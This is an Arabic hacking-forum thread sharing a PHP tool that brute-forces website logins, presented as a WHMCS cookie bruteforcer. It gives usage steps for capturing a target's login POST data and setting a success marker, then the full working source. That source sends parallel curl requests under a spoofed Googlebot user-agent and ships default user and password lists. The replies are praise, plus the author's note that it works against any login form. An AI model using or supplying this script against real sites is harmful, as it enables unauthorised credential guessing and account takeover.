حالة الموضوع:
مغلق
  1. Ubuntu

    Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    [​IMG]


    صحا فطوركم و صحا سحوركم
    سكربت يعمل بروت فورس طبعآ غني عن التعريف
    whmcs cookie bruteforcer
    صوره للسكربت


    [​IMG]


    نأتي للشرح مباشرة :


    Target


    تضع هنا رابط الموقع كامل
    في بعض الاحيان البيانات تعمل بوست لصفحة اخرى لذلك يجب و ضع الرابط الذي يذهب اليه البوست


    Post Data


    اولا نذهب الى صفحة دخول الموقع المراد عمل بروت فورس له :


    اليوزر :
    كود PHP:
    user_massacreur
    الباس:
    كود PHP:
    pass_massacreur

    الاستخراج البوست داتا استعمل اضافة فيرفوكس


    Live HTTP Headers 0.17


    ننسخ كامل عمليات البوست و الGET ان وجدت مع ملاحظة عمليات ال GET يوضع مع Target


    Marqueur positif
    هنا كل واحد و حيله يعني ما هو الاسم الموجود في اللوحة عند الدخول وليس موجود قبل الدخول
    هذا اهم جزء في السكربت لازم تكون كلمة مميزة


    MultiThreading
    السرعة : لم اضع رقم واضح انا افضل 20 و هناك عداد اضفته للتجربة
    يعني مدة البروت فورس


    الباقي وا ضح


    السورس كود :

    كود PHP:
     <?php
    /*
      coded by Massacreur || toxico-dz
      email : [email protected]
      Greetz :

        ||  alzher   ||   r0ckin  ||  Sql-Sniper || i-Hmx  || band3r  || Omleet-dz ||

      home : sec4ever.com

    */


    set_time_limit(0);
    if (isset (
    $_POST['target']) and isset ($_POST['data']) and isset ($_POST['users']) and isset ($_POST['passwords'])) {
      function 
    cln_arr($array) {
        return @ 
    array_filter(@ array_unique($array));
      }
      function 
    addHandle(& $curlHandle$url$post false$flw 1$timeout 30$cookies 1) {
        
    $cURL curl_init();
        
    curl_setopt($cURLCURLOPT_RETURNTRANSFER1);
        
    curl_setopt($cURLCURLOPT_URL$url);
        
    curl_setopt($cURLCURLOPT_SSL_VERIFYPEER0);
        
    curl_setopt($cURLCURLOPT_HEADER0);
        if (
    $cookies == 1) {
          
    curl_setopt($cURLCURLOPT_COOKIEFILEgetcwd() . '/cookie.txt');
          
    curl_setopt($cURLCURLOPT_COOKIEJARgetcwd() . '/cookie.txt');
        }
        
    curl_setopt($cURLCURLOPT_USERAGENT'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
        
    curl_setopt($cURLCURLOPT_FOLLOWLOCATION$flw);
        
    curl_setopt($cURLCURLOPT_TIMEOUT$timeout);
        if (
    $post) {
          
    curl_setopt($cURLCURLOPT_POST1);
          
    curl_setopt($cURLCURLOPT_POSTFIELDS$post);
        }
        
    curl_multi_add_handle($curlHandle$cURL);
        return 
    $cURL;
      }
    //execute the handle until the flag passed to function is greater then 0
      
    function ExecHandle(& $curlHandle) {
        
    $flag null;
        do {
          
    curl_multi_exec($curlHandle$flag);
    //fetch pages in parallel
        
    } while ($flag 0);
      }
      
    $url $_POST['target'];
      
    $data $_POST['data'];
      
    $mark '/' $_POST['mark'] . '/';
      
    $multithreading $_POST['multithreading'];
    //login=user_massacreur&password=pass_massacreur
      
    $users cln_arr(explode("\n"$_POST['users']));
      
    $passwords cln_arr(explode("\n"$_POST['passwords']));
      
    $data trim($data);
      for (
    $i 0; isset ($users[$i]); $i++) {
        
    $post_0[] = preg_replace('/user_massacreur/'trim($users[$i]), $data);
      }
      for (
    $i 0; isset ($post_0[$i]); $i++) {
        for (
    $h 0; isset ($passwords[$h]); $h++) {
          
    $post[] = preg_replace('/pass_massacreur/'trim($passwords[$h]), $post_0[$i]);
        }
      }
      
    $start_time time();
      for (
    $k 0; isset ($post[$k $multithreading]); $k++) {
        
    $jstart + ($k) * $multithreading;
        
    $jstop + ($k 1) * $multithreading;


        
    $curlHandle curl_multi_init();
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++)
          
    $curl[$i] = addHandle($curlHandle$url$post[$i], 1301);
        
    ExecHandle($curlHandle);
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++) {
          
    $text[$i] = curl_multi_getcontent($curl[$i]);
          if (
    preg_match($mark$text[$i])) {
            
    $baki= ($i 1)%count($passwords) ;  //48=3*15+3
            
    $id_user=($i-$baki1) / count($passwords);
            
    $id_pass=$baki   ;
            echo 
    '<font size="4" color="#FF0000">' . ($i 1) . ') yes  === > the user is :     <font size="4" color="#FF00FF">'.$users[$id_user].'</font>      the pass is : <font size="4" color="#FF00FF">'.$passwords[$id_pass-1].'</font><br /></font>';
          }
          else { echo (
    '<font size="4" color="#0000FF">' . ($i 1) . ') non  === > ' $post[$i] . '</font> <br />');}
        }
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++)
    //remove the handles
          
    curl_multi_remove_handle($curlHandle$curl[$i]);
        
    curl_multi_close($curlHandle);
      }
      
    $end_time time();
      
    $duree $end_time $start_time;
      echo 
    '<center><font size="7" color="#00FF00"> N° of pass tested :'.count($post).' pass /'$duree ' sec</font></center>';

    }
    else {
      echo 
    "

      <!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'
        'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
        <head>
      <title>Multithreading Brute Force Standard</title>
    </head>

    <body>

    <center><br>
            <h2>Multithreading Brute Force Standard</h2>
    <br>
    <form name='dz' method='POST' action=''>
        &nbsp;&nbsp;&nbsp;  &nbsp;&nbsp;&nbsp;&nbsp;Target&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;      : <input name='target' />     <br /><br />
       &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Post Data&nbsp;&nbsp;&nbsp;&nbsp;    : <input name='data' /> <br /><br />
     Marqueur positif : <input name='mark' value='logout' /> <br /><br />
      MultiThreading  : <input name='multithreading' value='20' /> <br /><br />
    <textarea rows='10' name='users' id='targets' cols='30'>admin
    administrateur
    login
    test
    </textarea>
    <textarea rows='10' name='passwords' cols='30'>admin
    123456
    123123
    102030
    159753
    1234567
    test
    12345678
    123456789
    </textarea><br><br>
    <input type='submit'  value='Start BruteForce' />
    </form>
    </center>
    "
    ;
    }
    ?>

    التحميل


    [​IMG]


    رابط اخر


    [​IMG]


    [​IMG]
     
    1 person likes this.
  2. wesker Hacker

    wesker Hacker Developer

    الأنتساب:
    ‏12 يناير 2013
    المشاركات:
    46
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    بارك الله فيك يامبدع

    جاري الـ ++ و التقييم + يوشم بالخماسي + لايك

    تستاهل
    &:" ​
     
  3. Ĝυēναяα

    Ĝυēναяα Developer

    الأنتساب:
    ‏21 يونيو 2012
    المشاركات:
    102
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    فلسطين
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    [b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][size=5][color=silver][font=tahoma][b][size=2]» [/size][/b][/font][/color][/size][/size][/font][/b][/size][/font][/b][/size][/font][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][color=#419c70][font=tahoma][size=2][b]وَعّليڪُم السُلامَ ورَحَمُــۃ اللهُ وبرڪَإآتــۃ [/b][/size][/font][/color][size=5][color=silver][font=tahoma][b][size=2]»[/size][/b][/font][/color][/size][/size][/font][/b][/size][/font][/b][/size][/font]

    [font=tahoma][size=2][color=#c0c0c0][b]بارك الله فيك يامبدع[/b][/color][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b]
    :{1}:​
     
  4. Ubuntu

    Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    شكرا لك اخي
    وبالتوفيق&:":​
     
  5. Ubuntu

    Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    موفق اخي ​
     
  6. Stav Ak

    Stav Ak Developer

    الأنتساب:
    ‏18 يونيو 2013
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    دورک ؟
     
  7. massacreur

    massacreur Developer

    الأنتساب:
    ‏24 ابريل 2013
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    حبيبي
    السكربت تبعي لكن الظاهر انك خلطت بين السكربتين
    هذا السكربت يعمل brute force على اي سكربت وليس whmcs
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة